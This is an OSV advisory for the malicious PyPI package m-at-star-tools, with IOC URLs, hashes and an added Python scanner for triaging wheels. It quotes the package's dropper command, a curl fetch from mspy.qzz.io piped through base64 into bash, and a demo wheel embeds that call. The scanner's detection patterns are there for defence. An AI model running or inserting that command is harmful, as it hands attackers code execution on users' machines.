MAL-2026-4812

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4812
Published
2026-05-26T10:43:03Z
Modified
2026-06-15T03:00:55.074895301Z
Summary
Malicious code in m-at-star-tools (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)

The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.

Source: kam193 (1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1)

The package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of the final data requires knowing a code.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-m-at-star-tools

Reasons (based on the campaign):

  • Downloads and executes a remote malicious script.

  • Obfuscation.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.4"
            ],
            "sha256": "2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2",
            "modified_time": "2026-05-26T10:43:03Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T13:32:46.10000306Z",
            "id": "IN-MAL-2026-004898"
        },
        {
            "versions": [
                "1.0.0",
                "1.0.3",
                "1.0.4"
            ],
            "sha256": "1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1",
            "modified_time": "2026-05-26T22:36:40.683327Z",
            "source": "kam193",
            "import_time": "2026-05-26T22:55:24.733407763Z",
            "id": "pypi/2026-05-m-at-star-tools/m-at-star-tools"
        }
    ],
    "iocs": {
        "urls": [
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/tspynstll_m0.nstll",
            "https://mspy.qzz.io/M0scan",
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/c_stp_m0.enc",
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/M0scan.tspy"
        ]
    }
}
References
Credits

Affected packages

PyPI / m-at-star-tools

Package: m-at-star-tools
Affected versions (1.*): 1.0.0, 1.0.3, 1.0.4

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "m_at_star_tools-1.0.4-py3-none-any.whl",
            "hashes": {
                "sha256": "e4b1029b090a2f5e83098519a58b83a77ced0f228fe77a93fec928dfffa4ce3e",
                "md5": "e596ae1287baa87c7dc4950483ef0a26",
                "blake2b_256": "2fdf8f9f96a1efcf3d000faf15d4a554556f77cd7c030e1a0cf7e01f029fc16a"
            }
        },
        {
            "filename": "m_at_star_tools-1.0.4.tar.gz",
            "hashes": {
                "sha256": "3d5426e74f8d1b6d608a481bad70b562336b77aba121dcac289d5690befba25a",
                "md5": "b95a8631d1acdeac368fb954f65ce8b1",
                "blake2b_256": "9a83a24d3a23eb0e22d2f620588a780e7dce3003d5e7cc896e5251b9d7254c73"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "ca9746b26f972a7f8aa2b0a1823d9478ce1ca35f65f7fc41bebb125768716f11",
            "path": "m0scan/main.py",
            "tlsh": "ecd097db05592060594183c40208a6d082382e1f1b90322ab3247aaa1f224ba42d08a2"
        },
        {
            "sha256": "78f01d2cb0943fab9d5a8d05bed9fcb2caaf90b6259899e9512bb536abf04367",
            "path": "PKG-INFO",
            "tlsh": "ced022207330e0363ec30b8d40793ab0f6f912106ac1202bc4e2dee1c30aa0823d2130"
        }
    ]
}
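The following is an added triage example, not code from OSV, the reporting sources, or the m-at-star-tools package. It combines the two checks this advisory supports: the amazon-inspector details describe a console_script that hands `curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash` to a shell, and the package_integrity and evidence_files blocks above give the sha256 values of the 1.0.4 wheel, the 1.0.4 sdist, and the two extracted files. The scanner parses a wheel in memory, matches the artifact and every member against those hashes, reads console_scripts from entry_points.txt, and walks each .py module's AST for os.system/subprocess calls whose literal command fetches a remote payload and pipes it into an interpreter. The sample wheel it builds is constructed for the demo (the exact call form in the real main.py is not shown on this page, so `os.system(...)` is an assumption); the regexes and sink names are heuristics chosen for this example.

```python
"""Static triage of a PyPI wheel against the indicators in MAL-2026-4812."""
import ast
import hashlib
import io
import re
import zipfile
from configparser import ConfigParser

# Indicators copied from this advisory's package_integrity / evidence_files blocks.
KNOWN_BAD_ARTIFACT_SHA256 = {
    "e4b1029b090a2f5e83098519a58b83a77ced0f228fe77a93fec928dfffa4ce3e",  # 1.0.4 wheel
    "3d5426e74f8d1b6d608a481bad70b562336b77aba121dcac289d5690befba25a",  # 1.0.4 sdist
}
EVIDENCE_FILE_SHA256 = {
    "ca9746b26f972a7f8aa2b0a1823d9478ce1ca35f65f7fc41bebb125768716f11": "m0scan/main.py",
    "78f01d2cb0943fab9d5a8d05bed9fcb2caaf90b6259899e9512bb536abf04367": "PKG-INFO",
}
IOC_SUBSTRINGS = ("mspy.qzz.io", "raw.githubusercontent.com/M-AT-STAR/run/")

# Heuristics (assumed for this example): call names that hand a command to a shell,
# a remote fetch piped into an interpreter, and an inline base64 decode.
SHELL_SINKS = {"system", "popen", "run", "call", "check_call", "check_output", "Popen"}
PIPE_TO_INTERPRETER = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:bash|sh|zsh|python3?)\b")
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")


def _sink_name(call: ast.Call):
    func = call.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else None


def _command_strings(call: ast.Call):
    """Yield literal command text: a string argument, or a list/tuple of strings joined."""
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            yield arg.value
        elif isinstance(arg, (ast.List, ast.Tuple)):
            parts = [e.value for e in arg.elts
                     if isinstance(e, ast.Constant) and isinstance(e.value, str)]
            if parts:
                yield " ".join(parts)


def scan_source(src: str, path: str = "<src>"):
    """Return one finding per shell-sink call whose literal command looks like a dropper."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call) or _sink_name(node) not in SHELL_SINKS:
            continue
        for cmd in _command_strings(node):
            reasons = []
            if PIPE_TO_INTERPRETER.search(cmd):
                reasons.append("remote fetch piped into an interpreter")
            if BASE64_DECODE.search(cmd):
                reasons.append("base64-decoded payload")
            reasons += [f"known IOC {ioc}" for ioc in IOC_SUBSTRINGS if ioc in cmd]
            if reasons:
                findings.append({"path": path, "line": node.lineno,
                                 "command": cmd, "reasons": reasons})
    return findings


def scan_wheel(wheel_bytes: bytes):
    """Hash the artifact and its members, read console_scripts, scan every .py member."""
    report = {"sha256": hashlib.sha256(wheel_bytes).hexdigest(), "known_bad_members": [],
              "console_scripts": {}, "findings": []}
    report["known_bad_artifact"] = report["sha256"] in KNOWN_BAD_ARTIFACT_SHA256
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if hashlib.sha256(data).hexdigest() in EVIDENCE_FILE_SHA256:
                report["known_bad_members"].append(name)
            if name.endswith(".dist-info/entry_points.txt"):
                cp = ConfigParser()
                cp.optionxform = str  # keep script names case-sensitive
                cp.read_string(data.decode())
                if cp.has_section("console_scripts"):
                    report["console_scripts"] = dict(cp.items("console_scripts"))
            elif name.endswith(".py"):
                report["findings"].extend(scan_source(data.decode(), name))
    return report


def build_sample_wheel() -> bytes:
    """CONSTRUCTED stand-in, not the real m-at-star-tools artifact: a wheel whose
    only console_script runs the one-liner quoted in the advisory via os.system."""
    main_py = ("import os\n\ndef main():\n"
               '    os.system("curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash")\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("m0scan/__init__.py", "")
        zf.writestr("m0scan/main.py", main_py)
        zf.writestr("sample-1.0.4.dist-info/entry_points.txt",
                    "[console_scripts]\nm0scan = m0scan.main:main\n")
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(scan_wheel(build_sample_wheel()), indent=2))
```

Because the sample wheel is constructed, neither its archive hash nor its member hashes match the advisory; running the same scanner over a downloaded `m_at_star_tools-1.0.4-py3-none-any.whl` would match on the artifact hash alone, which is the check to run first. The AST pass only sees string literals, so a command assembled at runtime, or the follow-on stages the kam193 source describes (encoded code that fetches further encrypted stages), will not be flagged by it; for those, pair the static scan with a network-isolated install in a sandbox and egress logging for the IOC hosts.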
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]